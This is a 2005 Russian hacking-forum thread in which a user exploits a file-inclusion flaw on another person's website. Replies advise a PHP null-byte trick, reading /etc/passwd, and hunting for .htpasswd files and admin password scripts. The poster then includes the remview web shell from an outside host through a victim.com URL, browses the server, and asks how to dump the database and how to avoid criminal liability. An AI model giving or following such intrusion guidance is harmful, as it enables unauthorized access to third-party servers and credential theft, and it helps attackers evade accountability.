ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Нашел небольшую дырочку на одном сайте, нужен совет
  #1  
Старый 19.07.2005, 02:06
Аватар для paras1t3
paras1t3
Новичок
Регистрация: 17.04.2005
Сообщений: 1
Провел на форуме:
1224

Репутация: 0
По умолчанию Нашел небольшую дырочку на одном сайте, нужен совет

отредактировал. Вдруг их адним тоже на античат вздумает зайти

Последний раз редактировалось paras1t3; 19.07.2005 в 03:01..
 
Ответить с цитированием

  #2  
Старый 19.07.2005, 02:16
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

Начнем с того что в старых версиях ПХП возможно использовать NULL-BYTE.
Тоесть чтобы экранировать .txt можно использовать %00
Во вторых, чтоже можно сделать чтением файлов?
Для начала попробуй прочитать /etc/passwd. В 5% случаев их можно читать =)

Далее. Прочитай и сохрани /etc/passwd. Он даст список юзеров.

Далее. Попробуй найти на сайте HTTP-passwd-like файлы типа .htpassword .htaccess и т д. И ещё попробуй найти зоны администрирования (наверняка же есть чтото) и прочитать скрипт, содержащий логин и пароль.
 
Ответить с цитированием

  #3  
Старый 19.07.2005, 02:32
Аватар для tester2005
tester2005
Познающий
Регистрация: 17.01.2005
Сообщений: 48
Провел на форуме:
24128

Репутация: 15
По умолчанию

Ну в прибавок могу отписать, что судя по ошибке, параметр 'a' возможно не фильтрует входящие данные, что может позволить инклудинг и запуск файла, тоесть любой php код, сохраненный в текстовом файле вероятно запуститса на сервере...это тока теоретическое суждение, верно ли или нет сказать не могу.

не известно одно, можно ли эксплуатировать уязвимость удаленно, уже ясно что локально можно..
Попрпбуй добавь к параметру 'a' http:// еси от фильтрует, то значит ток локально.

Последний раз редактировалось tester2005; 19.07.2005 в 02:35..
 
Ответить с цитированием

  #4  
Старый 19.07.2005, 02:37
Аватар для paras1t3
paras1t3
Новичок
Регистрация: 17.04.2005
Сообщений: 1
Провел на форуме:
1224

Репутация: 0
По умолчанию

так и есть - любой РНР код который записан в текстовике потом обрабатывается через index.php и выполняется как РНР,
Залил ремвью через форум, только незнаю в какой папке лежит.
+ там же файл переименовывается. Форум Инвижен 2.0 )
 
Ответить с цитированием

  #5  
Старый 19.07.2005, 02:44
Аватар для paras1t3
paras1t3
Новичок
Регистрация: 17.04.2005
Сообщений: 1
Провел на форуме:
1224

Репутация: 0
По умолчанию

ай-ай-ай! запустился ремвью из удаленного адреса! ненавижу удаффский сленг, но "РЖУНИМАГУ"

Народ, теперь такой вопросец:
я можно сказать - начинающий. и работаю даже не через проксю Посоветуйте что мне прочитать как себя обезопасить от уголовной отвественности.
 
Ответить с цитированием

  #6  
Старый 19.07.2005, 02:49
Аватар для paras1t3
paras1t3
Новичок
Регистрация: 17.04.2005
Сообщений: 1
Провел на форуме:
1224

Репутация: 0
По умолчанию

хех.. рано обрадовался:

ремвью запускаю так:

http://victim.com/index.php?a=http:/...men.ru/remview

запускается ремвью, но все ссылки в нем такого вида:
http://victim.com/index.php?&c=v&d=d...2F&f=about.txt

вообщем мне ремвью только смог показать какие там папки, но ничего просмотреть и скачать я не смогу... хотя может я чтото непонимаю?
 
Ответить с цитированием

  #7  
Старый 19.07.2005, 02:50
Аватар для paras1t3
paras1t3
Новичок
Регистрация: 17.04.2005
Сообщений: 1
Провел на форуме:
1224

Репутация: 0
По умолчанию

в любом случае остается возможность запуска любого Мускульного кода.
Подскажите, пожалуйста, - какой командой можно просмотреть структуру базы данных?
 
Ответить с цитированием

  #8  
Старый 19.07.2005, 02:54
Аватар для paras1t3
paras1t3
Новичок
Регистрация: 17.04.2005
Сообщений: 1
Провел на форуме:
1224

Репутация: 0
По умолчанию

ой немогу нормально ремвью работает, просто нужно добавлять параметры так

http://victim.com/index.php?a=http:/...%2Fwww%2Fadmin
 
Ответить с цитированием

  #9  
Старый 19.07.2005, 02:57
Аватар для tester2005
tester2005
Познающий
Регистрация: 17.01.2005
Сообщений: 48
Провел на форуме:
24128

Репутация: 15
По умолчанию

ну похвально, сам находишь ответы =)
 
Ответить с цитированием

  #10  
Старый 19.07.2005, 03:00
Аватар для paras1t3
paras1t3
Новичок
Регистрация: 17.04.2005
Сообщений: 1
Провел на форуме:
1224

Репутация: 0
По умолчанию

а по поводу моей анонимности, подскажите пожалуйста.

и по поводу просмотра структуры БД
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
НУжен Хелп Хацкеров anakin Болталка 18 21.09.2006 19:21



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ